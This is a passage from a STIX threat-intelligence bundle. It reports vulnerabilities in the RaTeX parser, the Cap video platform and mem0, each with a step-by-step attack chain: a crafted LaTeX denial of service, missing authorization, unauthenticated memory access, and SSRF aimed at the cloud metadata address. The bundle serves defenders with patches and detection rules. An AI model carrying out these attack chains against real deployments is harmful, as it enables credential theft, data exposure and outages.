scope.\n",
      "published": "2026-07-07T23:44:24Z",
      "labels": [
        "idor",
        "rce",
        "web-vulnerability",
        "go",
        "github-advisory",
        "linux"
      ],
      "object_refs": [
        "indicator--2c4be31c-dd2a-5526-911e-0b4fb176a6b3",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-26rh-24rg-j3vv"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31ad08ec-4eff-50f9-abc4-35c47b5045b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--897b2571-d555-5fda-abf0-71cc21ea30f3",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--897b2571-d555-5fda-abf0-71cc21ea30f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "RaTeX Parser Vulnerability Allows Denial of Service via Crafted LaTeX Input (CVE-2026-53530)",
      "description": "## Overview\n\nA critical denial-of-service vulnerability, identified as CVE-2026-53530, exists in the `ratex-parser` Rust library, specifically affecting versions prior to 0.1.11. This flaw allows an attacker to trigger a process-wide crash by providing a maliciously crafted LaTeX input string. The vulnerability manifests when the parser attempts to handle a `\\verb` command where a multibyte UTF-8 character (e.g., `é`) is used as a delimiter. Due to incorrect byte-level slicing instead of character-level slicing, the Rust runtime panics with a \"byte index is not a char boundary\" error. Crucially, because RaTeX's release builds are configured with `panic = \"abort\"`, this panic results in the immediate termination of the entire application process, leading to a hard denial of service for any service, such as web-based LaTeX renderers or embedded FFI applications, that processes untrusted LaTeX input.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious LaTeX input string containing a `\\verb` command.\n2.  The `\\verb` command is intentionally constructed with a multibyte UTF-8 character (e.g., `é` which is `C3 A9` in bytes) as its delimiter (e.g., `\\verbéxé`).\n3.  An application, relying on the vulnerable `ratex-parser` library (versions `\u003c 0.1.11`), receives and attempts to process this untrusted LaTeX input through its `ratex_parser::parse()` function.\n4.  The parser's `parse_symbol_inner` function (`parser.rs:910`) attempts to slice the verbatim argument using byte indices (`arg[1..arg.len() - 1]`).\n5.  Since the delimiter is multibyte, byte index `1` falls within the middle of the first character's byte sequence, not on a character boundary.\n6.  The Rust runtime detects this invalid slicing operation and triggers a panic with the message \"byte index 1 is not a char boundary\".\n7.  Due to the `panic = \"abort\"` configuration in RaTeX's release profile, the triggered panic causes the entire application process to abruptly terminate.\n8.  The application becomes unavailable, resulting in a complete denial of service and potentially loss of any ongoing or queued work.\n\n## Impact\n\nThe successful exploitation of CVE-2026-53530 leads to a hard denial of service for any application utilizing the vulnerable `ratex-parser` library to render untrusted LaTeX. A single malicious input string can crash the entire process, making the service unavailable. This impacts web applications that expose a LaTeX rendering endpoint, WASM-based in-browser LaTeX processing, or any application embedding RaTeX via Foreign Function Interface (FFI). In batch processing scenarios, the crash can lead to the loss of all queued work, causing significant operational disruption and data loss.\n\n## Recommendation\n\n*   Upgrade the `ratex-parser` library to version 0.1.11 or newer immediately to mitigate CVE-2026-53530.\n*   Review application build configurations to understand `panic` settings; consider avoiding `panic = \"abort\"` in long-running services for greater resilience.\n*   Implement robust error handling, such as `catch_unwind`, around the `ratex-parser` library calls at FFI or WASM boundaries to gracefully recover from potential panics.\n",
      "published": "2026-07-07T23:41:38Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "rust"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4hgp-59h5-gvrj"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dcf575ed-1b35-5bf5-a37c-86fec8bd8f80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0b3e0eb0-8cac-5743-bbda-a56d7ea76fd7",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2abc160d-3dcc-5d32-b005-58ec7b18bb46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Resource Hijacking",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1496",
          "url": "https://attack.mitre.org/techniques/T1496"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5acb5ca4-3e95-5681-83da-e25119c3f281",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0b3e0eb0-8cac-5743-bbda-a56d7ea76fd7",
      "target_ref": "attack-pattern--2abc160d-3dcc-5d32-b005-58ec7b18bb46"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0b3e0eb0-8cac-5743-bbda-a56d7ea76fd7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59704: Cap's /api/video/ai Endpoint Missing Authorization",
      "description": "## Overview\n\nCVE-2026-59704, a critical missing authorization vulnerability (CWE-862), affects the Cap video platform, specifically within the `/api/video/ai` endpoint. This vulnerability, disclosed on July 7, 2026, allows any authenticated attacker to bypass intended access controls. By supplying arbitrary video IDs to the `/api/video/ai` endpoint, an attacker can access sensitive AI-generated metadata—such as titles, summaries, and chapters—associated with private videos not owned by them. Furthermore, exploitation can trigger additional AI processing on these unauthorized videos, leading to the consumption of the legitimate video owner's paid credits without their consent. The vulnerability affects Cap versions up to and including commit `8d48642b6e7938af238386383ef1c273be4110dd`.\n\n## Attack Chain\n\n1.  Attacker obtains valid user credentials for a Cap account through various means (e.g., phishing, credential stuffing).\n2.  Using these valid credentials, the attacker authenticates to the Cap platform.\n3.  The attacker crafts and sends a `GET` request to the vulnerable `/api/video/ai` endpoint, including a `video_id` parameter corresponding to a private video not owned by the attacker.\n4.  Due to the missing authorization check (CVE-2026-59704), the Cap application fails to verify the attacker's ownership or membership rights for the requested video.\n5.  The application processes the request as if authorized and returns the sensitive AI-generated metadata (titles, summaries, chapters) associated with the specified private `video_id`.\n6.  In addition to data exposure, the request may also inadvertently trigger further AI generation processes for the targeted video.\n7.  These unauthorized AI generation tasks consume the legitimate video owner's allocated service credits, incurring financial costs or resource depletion for the victim.\n8.  The attacker continues to iterate through various `video_id` values to exfiltrate metadata from multiple private videos and exhaust other users' credits.\n\n## Impact\n\nThe primary impacts of CVE-2026-59704 exploitation are unauthorized access to sensitive data and resource hijacking. Attackers can exfiltrate confidential AI-generated metadata from private videos, potentially exposing intellectual property, sensitive communication content, or personal information. The ability to trigger unauthorized AI generation leads to direct financial costs for legitimate users as their service credits are consumed without consent. While no specific victim count or targeted sectors are provided, any Cap user with private videos is a potential target, and organizations relying on Cap for sensitive content management face significant data breach risks.\n\n## Recommendation\n\n*   Immediately update Cap to a version that addresses CVE-2026-59704 (e.g., commit `8d48642b6e7938af238386383ef1c273be4110dd` or newer), as indicated by the fix available in the referenced GitHub repository.\n*   Deploy the provided Sigma rule to detect suspicious `GET` requests to the `/api/video/ai` endpoint in your web server logs.\n*   Monitor web server and application logs for unusual patterns of authenticated users accessing the `/api/video/ai` endpoint with various, non-owned `video_id` parameters.\n",
      "published": "2026-07-07T23:19:23Z",
      "labels": [
        "web-application",
        "vulnerability",
        "missing-authorization",
        "api-exploitation",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--2abc160d-3dcc-5d32-b005-58ec7b18bb46"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59704"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/CapSoftware/Cap"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/CapSoftware/Cap/commit/8d48642b6e7938af238386383ef1c273be4110dd"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/CapSoftware/Cap/issues/1981"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/CapSoftware/Cap/pull/1926"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/cap-missing-access-control-in-video-ai-metadata-endpoint"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17085fdb-fa06-5fee-b6e6-9539ba499239",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mem0ai/mem0",
      "pattern": "[url:value = 'https://github.com/mem0ai/mem0']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T23:18:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c84a0858-20b9-5e81-ae4a-48216109119a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "indicator--17085fdb-fa06-5fee-b6e6-9539ba499239"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--10ca9fb5-dffb-554e-ae70-e4de84d78b18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mem0ai/mem0/commit/a3154d59e52386d4e1189c1f5f44819868f76514",
      "pattern": "[url:value = 'https://github.com/mem0ai/mem0/commit/a3154d59e52386d4e1189c1f5f44819868f76514']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T23:18:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32bcfa21-9eed-594d-9b16-f43b58001e69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "indicator--10ca9fb5-dffb-554e-ae70-e4de84d78b18"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c0974946-8dd7-52d4-bfaa-35d9ae0361b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mem0ai/mem0/issues/6080",
      "pattern": "[url:value = 'https://github.com/mem0ai/mem0/issues/6080']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T23:18:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--247623ef-7d46-5d8f-b965-e2409c01b8c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "indicator--c0974946-8dd7-52d4-bfaa-35d9ae0361b4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2398daf1-74fb-5879-958a-3aff39c75a91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/mem0-openmemory-api-unauthenticated-access-via-memory-endpoints",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/mem0-openmemory-api-unauthenticated-access-via-memory-endpoints']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T23:18:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2aa620f1-8287-5936-bb40-7f312470c496",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "indicator--2398daf1-74fb-5879-958a-3aff39c75a91"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dde4e159-4c89-5b5f-a3d0-edc328d3e127",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8d1c704-a1df-5985-927d-0de33811b465",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Disk Wipe",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1561",
          "url": "https://attack.mitre.org/techniques/T1561"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--877e1166-87b1-516f-8f59-52611e6d1b50",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--39714958-e17d-5c11-a716-86d7ea5b7f90",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e38dd3ca-4b40-5f81-9bee-6ac5803aec4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59705: mem0 openmemory/api Unauthenticated Access and DoS Vulnerability",
      "description": "## Overview\n\nCVE-2026-59705 describes a critical unauthenticated access vulnerability affecting the `openmemory/api` component of the `mem0` application. Published on July 7, 2026, this flaw stems from API routers that were registered without proper authentication middleware, allowing any unauthenticated attacker to bypass security controls. Exploitation enables attackers to read, write, or delete arbitrary user memories by supplying specific `user_id` parameters or directly accessing memory retrieval endpoints. Furthermore, attackers can trigger a denial-of-service (DoS) condition for all `mem0` users by invoking `pause` endpoints with `global_pause=true`. The vulnerability affects all versions of `mem0` prior to commit `a3154d59e52386d4e1189c1f5f44819868f76514`. This vulnerability poses a significant risk of data breach, data manipulation, and service disruption for `mem0` deployments.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a `mem0` instance exposed to the network.\n2.  The attacker sends specially crafted HTTP requests targeting `mem0`'s `/openmemory/api` endpoints, bypassing authentication due to missing middleware.\n3.  To access user memories, the attacker includes arbitrary `user_id` parameters in API requests or directly queries memory retrieval endpoints.\n4.  The `mem0` application processes these unauthenticated requests, allowing the attacker to read private memory content associated with any user.\n5.  Alternatively, the attacker leverages similar unauthenticated access to memory modification or deletion endpoints to arbitrarily write or delete user memories.\n6.  For a denial-of-service attack, the attacker sends an unauthenticated request to the `pause` endpoint, specifying `global_pause=true`.\n7.  The `mem0` application enters a paused state, disrupting service for all legitimate users.\n8.  The attacker achieves unauthorized data exposure, data integrity compromise, or complete service unavailability.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-59705 leads to severe consequences. Attackers can gain complete unauthorized access to private user memories, enabling the exposure of sensitive personal or corporate data stored within the `mem0` application. This also allows for the arbitrary modification or deletion of these memories, leading to data integrity issues or data loss. Beyond data compromise, the ability to trigger a global denial-of-service renders the `mem0` application unusable for all users, impacting business continuity and availability. The high CVSS score of 9.8 reflects the critical nature of this vulnerability, indicating potential for widespread and devastating damage.\n\n## Recommendation\n\n*   **Patch CVE-2026-59705 immediately**: Update your `mem0` deployment to a version that includes commit `a3154d59e52386d4e1189c1f5f44819868f76514` or later as described in the references.\n*   **Deploy the Sigma rules in this brief**: Ensure that detection rules for `Detect CVE-2026-59705 Data Access/Manipulation` and `Detect CVE-2026-59705 Denial-of-Service Attempt` are implemented in your SIEM.\n*   **Review web server logs for exploitation attempts**: Actively monitor for HTTP requests targeting `/openmemory/api` endpoints that contain `user_id=` or `global_pause=true` in the query string without prior authentication, as described in the `rules` section.\n",
      "published": "2026-07-07T23:18:20Z",
      "labels": [
        "web-application",
        "api-vulnerability",
        "data-exposure",
        "denial-of-service",
        "critical-vulnerability"
      ],
      "object_refs": [
        "indicator--17085fdb-fa06-5fee-b6e6-9539ba499239",
        "indicator--10ca9fb5-dffb-554e-ae70-e4de84d78b18",
        "indicator--c0974946-8dd7-52d4-bfaa-35d9ae0361b4",
        "indicator--2398daf1-74fb-5879-958a-3aff39c75a91",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59705"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mem0ai/mem0"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mem0ai/mem0/commit/a3154d59e52386d4e1189c1f5f44819868f76514"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mem0ai/mem0/issues/6080"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/mem0-openmemory-api-unauthenticated-access-via-memory-endpoints"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--99a1b1a7-dc93-5179-b1d9-b70fac9f5116",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--89c65bd0-43ae-5eda-8096-22d188fa8283",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--851a6bd4-7cdd-5846-b18e-333eb93f8020",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--89c65bd0-43ae-5eda-8096-22d188fa8283",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2ab7261b-3697-5318-a1e1-d12f4f1f2594",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--89c65bd0-43ae-5eda-8096-22d188fa8283",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--89c65bd0-43ae-5eda-8096-22d188fa8283",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59706: mem0 Unauthenticated API Key Exposure and SSRF Vulnerability",
      "description": "## Overview\n\nmem0 contains unauthenticated configuration API endpoints, identified as CVE-2026-59706, that present two critical vulnerabilities. Firstly, these endpoints expose plaintext Large Language Model (LLM) API keys, such as OpenAI API keys, to any unauthenticated attacker sending a GET request to `/api/v1/config/`. This allows for direct theft of sensitive credentials. Secondly, the `ollama_base_url` parameter in the `PUT /api/v1/config/mem0/llm` endpoint is vulnerable to Server-Side Request Forgery (SSRF). Attackers can manipulate this parameter to force the `mem0` application to make requests to internal network resources, including cloud Instance Metadata Services (IMDS). This flaw enables attackers to exfiltrate internal cloud credentials, map internal networks, or potentially achieve remote code execution. This vulnerability affects `mem0` installations up to commit `a3154d5` and carries a CVSS v3.1 score of 9.3, posing a severe risk to data confidentiality and integrity.\n\n## Attack Chain\n\n1.  **Discovery**: An unauthenticated attacker identifies a publicly accessible `mem0` instance by scanning or other reconnaissance methods.\n2.  **Information Disclosure (API Keys)**: The attacker sends an unauthenticated HTTP GET request to the `/api/v1/config/` endpoint of the vulnerable `mem0` application.\n3.  **Credential Acquisition**: The `mem0` instance responds with its configuration details, which include stored plaintext LLM API keys, such as OpenAI API keys, directly exposing them to the attacker.\n4.  **SSRF Attempt (Endpoint Targeting)**: Alternatively, the attacker sends an unauthenticated HTTP PUT request to the `/api/v1/config/mem0/llm` endpoint.\n5.  **SSRF Payload Injection**: The attacker crafts the request body to include the `ollama_base_url` parameter, setting its value to an internal network address or service, such as a cloud Instance Metadata Service (IMDS) endpoint (e.g., `http://169.254.169.254/latest/meta-data/`).\n6.  **Internal Request Execution**: Due to the SSRF vulnerability, the `mem0` application makes a server-side request to the attacker-specified internal address using its own context and permissions.\n7.  **Data Exfiltration/Further Exploitation**: The attacker receives the response from the internal service (e.g., cloud credentials from IMDS) via the `mem0` application, allowing for further compromise like credential theft, internal network mapping, or potentially remote code execution.\n8.  **Impact**: The attacker gains access to highly sensitive API keys or internal cloud infrastructure resources, leading to potential data exfiltration, service disruption, or further lateral movement.\n\n## Impact\n\nThe impact of CVE-2026-59706 is severe, earning a CVSS v3.1 score of 9.3 (Critical). Successful exploitation allows unauthenticated attackers to steal sensitive Large Language Model API keys (e.g., OpenAI API keys) in plaintext. This directly compromises account security, potentially leading to unauthorized API usage, financial costs, and access to data associated with those keys. Furthermore, the Server-Side Request Forgery (SSRF) capability enables attackers to access internal network resources, including cloud Instance Metadata Services (IMDS), which can lead to the exfiltration of temporary cloud credentials. This allows for privilege escalation within cloud environments, access to sensitive metadata, and the ability to pivot to other internal systems, putting entire cloud infrastructure at risk. The vulnerability affects `mem0` installations up to commit `a3154d5`.\n\n## Recommendation\n\n*   Patch CVE-2026-59706 immediately by upgrading `mem0` to a version beyond commit `a3154d59e52386d4e1189c1f5f44819868f76514` or applying the latest available security patches.\n*   Deploy the Sigma rules \"Detect mem0 Unauthenticated API Key Exposure Attempt\" and \"Detect mem0 SSRF Attempt via ollama_base_url\" to your SIEM for immediate detection of exploitation attempts.\n*   Monitor web server logs for unauthenticated HTTP GET requests to `/api/v1/config/` and HTTP PUT requests to `/api/v1/config/mem0/llm` that contain the `ollama_base_url` parameter.\n*   Implement robust network segmentation to restrict the `mem0` application's outbound access to sensitive internal services (like IMDS) and private IP ranges.\n",
      "published": "2026-07-07T22:20:31Z",
      "labels": [
        "vulnerability",
        "ssrf",
        "api-key-exposure",
        "plaintext-credentials",
        "cloud"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59706"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mem0ai/mem0"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mem0ai/mem0/commit/a3154d59e52386d4e1189c1f5f44819868f76514"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mem0ai/mem0/issues/6081"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/mem0-server-side-request-forgery-and-plaintext-api-key-exposure-via-unauthenticated-config-endpoints"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c3d12f69-8681-55af-906d-780127f5b8d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mudler/LocalAI",
      "pattern": "[url:value = 'https://github.com/mudler/LocalAI']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T21:21:59Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--047ec232-3b95-57fa-aaa3-c9c0648ff781",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "target_ref": "indicator--c3d12f69-8681-55af-906d-780127f5b8d9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cc1bd912-f0fe-509e-92ee-e004d5267b04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mudler/LocalAI/commit/f9b968e19d7cbc556d59dceb2e0e450b828a3fda",
      "pattern": "[url:value = 'https://github.com/mudler/LocalAI/commit/f9b968e19d7cbc556d59dceb2e0e450b828a3fda']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T21:21:59Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b6fc740-b1f9-5eff-bda6-23c7b4e7839d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "target_ref": "indicator--cc1bd912-f0fe-509e-92ee-e004d5267b04"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--45decfad-8399-55e5-be19-401740cfa5af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mudler/LocalAI/issues/10665",
      "pattern": "[url:value = 'https://github.com/mudler/LocalAI/issues/10665']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T21:21:59Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7efa8c51-dbf4-598b-87df-04588838e89f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "target_ref": "indicator--45decfad-8399-55e5-be19-401740cfa5af"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
